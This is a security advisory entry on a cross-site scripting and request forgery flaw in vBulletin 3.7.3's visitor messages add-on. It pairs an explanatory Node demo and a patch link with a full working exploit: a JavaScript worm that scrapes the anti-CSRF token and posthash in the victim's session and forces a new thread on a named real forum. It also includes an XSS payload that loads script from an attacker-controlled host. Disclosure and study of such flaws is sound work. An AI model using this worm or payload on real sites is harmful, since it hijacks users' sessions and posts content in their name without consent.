vBulletin Visitor Messages Add-on Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities
Added:
2008-12-09
System ID:
WAVDB-01285
BUGTRAQ: 32387
Affected versions:
vBulletin 3.7.3
Program description:
vBulletin is a professional, affordable community forum solution. Thousands of customers, including many industry-leading companies, have chosen vBulletin; it is the ideal choice for any medium-to-large site community.
With it your site can become a hub of information and discussion, encouraging visitors to return again and again. It is also an efficient way to improve the service you offer your customers or site users. Our dedicated development team keeps vBulletin at the forefront of Internet innovation while staying focused on security and performance.
Vulnerability analysis:
The visitor messages add-on used by vBulletin forums (a wall/comment area similar to a social network profile) contains an output-encoding flaw, reported as an input validation error. When a message containing cross-site scripting is posted, the data is run through htmlentities() before being displayed to the general public and forum members. However, posting a new message also sends a notification to the user being commented on, and that notification is rendered without the same encoding. A commenter can therefore post an XSS vector such as <script src="http://evilsite.com/nbd.js">, and when the recipient visits usercp.php on the forum's domain the payload executes unfiltered. Because the injected script runs on the forum origin, it can also fetch pages in the victim's session, read the anti-CSRF securitytoken and posthash out of the response and submit forged requests; the exploit below includes a worm that does exactly this, making the victim post a new thread with an attacker-chosen subject and message.
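The following is an added example, not the Mx exploit and not vBulletin's own code, written in JavaScript so it runs under Node without a forum. It models the two render paths described above (public display through htmlentities() versus the raw notification in usercp.php) and shows why the forum's securitytoken does not stop the follow-on request forgery: script on the forum origin can read the token and posthash from newthread.php and rebuild the postthread form body. The page fragment, the escapeHtml helper and all function names are constructed for the demo; the token and posthash lengths (51 and 32 characters) are taken from the substring offsets the exploit uses.

```javascript
// Added example (not part of the Mx exploit or of vBulletin). Demonstrates:
//  1. the XSS sink: the user CP notification renders the visitor message
//     without the htmlentities() step used on the public profile page, and
//  2. why vBulletin's anti-CSRF token does not stop the worm: script running
//     on the forum origin can read SECURITYTOKEN and posthash out of
//     newthread.php and replay them in a forged POST.
// All HTML fragments and helper names here are constructed for the demo.

const PAYLOAD = '<script src="http://evilsite.com/nbd.js"></script>';

// Stand-in for PHP htmlentities() for the characters that matter in HTML text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;',
  }[c]));
}

// Public profile path, as the advisory describes it: encoded before display.
function renderPublicMessage(msg) {
  return '<div class="vmessage">' + escapeHtml(msg) + '</div>';
}

// Vulnerable notification path (the bug): raw message interpolated into usercp.php output.
function renderNotificationVulnerable(msg) {
  return '<div class="notification">New visitor message: ' + msg + '</div>';
}

// Fixed notification path: encode at this sink as well.
function renderNotificationFixed(msg) {
  return '<div class="notification">New visitor message: ' + escapeHtml(msg) + '</div>';
}

// True if a rendered fragment still carries a live <script> tag from the payload.
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Constructed stand-in for the part of newthread.php that the worm scrapes.
// The 51-character token (10-digit timestamp, '-', 40 hex chars) and the
// 32-character posthash match the fixed offsets used in the exploit.
const SAMPLE_NEWTHREAD_HTML = [
  '<script type="text/javascript">',
  'var SECURITYTOKEN = "1228780800-0123456789abcdef0123456789abcdef01234567";',
  '</script>',
  '<input type="hidden" name="posthash" value="0123456789abcdef0123456789abcdef" />',
].join('\n');

// Regex-based extraction instead of fixed offsets; null if either value is missing.
function extractTokens(html) {
  const tok = /var SECURITYTOKEN = "([^"]+)"/.exec(html);
  const ph = /name="posthash" value="([^"]*)"/.exec(html);
  if (!tok || !ph) return null;
  return { securitytoken: tok[1], posthash: ph[1] };
}

// Build the application/x-www-form-urlencoded body for newthread.php?do=postthread,
// with the same fields the worm sends but properly percent-encoded.
function buildPostThreadBody(tokens, forumId, subject, message) {
  const p = new URLSearchParams({
    subject, message, wysiwyg: '0', taglist: '', iconid: '0', s: '',
    securitytoken: tokens.securitytoken, f: String(forumId), do: 'postthread',
    posthash: tokens.posthash, poststarttime: '1', loggedinuser: '1',
    sbutton: 'Submit New Thread', signature: '1', parseurl: '1',
    emailupdate: '0', polloptions: '4',
  });
  return p.toString();
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('public page live script?      ', containsLiveScript(renderPublicMessage(PAYLOAD)));
  console.log('vulnerable notification live? ', containsLiveScript(renderNotificationVulnerable(PAYLOAD)));
  console.log('fixed notification live?      ', containsLiveScript(renderNotificationFixed(PAYLOAD)));
  const t = extractTokens(SAMPLE_NEWTHREAD_HTML);
  console.log('scraped tokens:', t);
  console.log('forged body:', buildPostThreadBody(t, 5, 'subject text', 'message text'));
}
```

The lesson the token half of the example makes concrete: a per-session anti-CSRF token only defends against requests forged from another origin. Once an attacker's script executes on the forum's own origin, the token is just another string in a response it is allowed to read, so fixing the XSS sink is the only real mitigation.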
Exploit:
/* -----------------------------
 * Author = Mx
 * Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
 * Software = vBulletin
 * Addon = Visitor Messages
 * Version = 3.7.3
 * Attack = XSS/XSRF
 * Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
 *   with the visitor messages addon (a clone of a social network wall/comment area).
 *   When posting XSS, the data is run through htmlentities(); before being displayed
 *   to the general public/forum members. However, when posting a new message,
 *   a new notification is sent to the commentee. The commenter posts an XSS vector such as
 *   <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
 *   under the domain, they are hit with an unfiltered XSS attack. XSRF is also readily available
 *   and I have included an example worm that makes the user post a new thread with your own
 *   specified subject and message.
 * Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
 * of the attack method.
 * ----------------------------- */

// Cross-browser XMLHttpRequest factory (old IE ActiveX objects first, then native).
function getNewHttpObject() {
  var objType = false;
  try {
    objType = new ActiveXObject('Msxml2.XMLHTTP');
  } catch (e) {
    try {
      objType = new ActiveXObject('Microsoft.XMLHTTP');
    } catch (e2) {
      objType = new XMLHttpRequest();
    }
  }
  return objType;
}

// Step 1: fetch the new-thread form in the victim's session (same origin, cookies
// attached), scrape the anti-CSRF SECURITYTOKEN and the posthash from the response,
// then hand them to postAXAH() to submit the forged thread.
function getAXAH(url) {
  var theHttpRequest = getNewHttpObject();
  theHttpRequest.onreadystatechange = function () { processAXAH(); };
  theHttpRequest.open("GET", url);
  theHttpRequest.send(null);
  function processAXAH() {
    if (theHttpRequest.readyState == 4) {
      if (theHttpRequest.status == 200) {
        var str = theHttpRequest.responseText;
        // 'var SECURITYTOKEN = "' is 21 chars; the token itself is 51 chars (timestamp-hash)
        var secloc = str.indexOf('var SECURITYTOKEN = "');
        var sectok = str.substring(21 + secloc, secloc + 51 + 21);
        // 'posthash" value="' is 17 chars; the posthash is a 32-char md5
        var posloc = str.indexOf('posthash" value="');
        var postok = str.substring(17 + posloc, posloc + 32 + 17);
        var subject = 'subject text';
        var message = 'message text';
        postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5',
          'subject=' + encodeURIComponent(subject) + '&message=' + encodeURIComponent(message) +
          '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok +
          '&f=5&do=postthread&posthash=' + postok +
          '&poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');
      }
    }
  }
}

// Step 2: POST the forged newthread.php form with the scraped tokens.
function postAXAH(url, params) {
  var theHttpRequest = getNewHttpObject();
  theHttpRequest.onreadystatechange = function () { processAXAHr(); };
  theHttpRequest.open("POST", url);
  theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
  theHttpRequest.send(params);
  function processAXAHr() {
    if (theHttpRequest.readyState == 4) {
      if (theHttpRequest.status == 200) {
        // thread has been posted; nothing further to do
      }
    }
  }
}

getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');
document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5"></iframe>');
Solution:
Vendor patch:
vBulletin
---------
The vendor has released a patch to fix this security issue; download it from the vendor's site:
http://members.vbulletin.com/patches.php
Source:
<*Source: Mx
Link: http://secunia.com/advisories/32782/
http://www.vbulletin.com/forum/showthread.php?t=291665
*>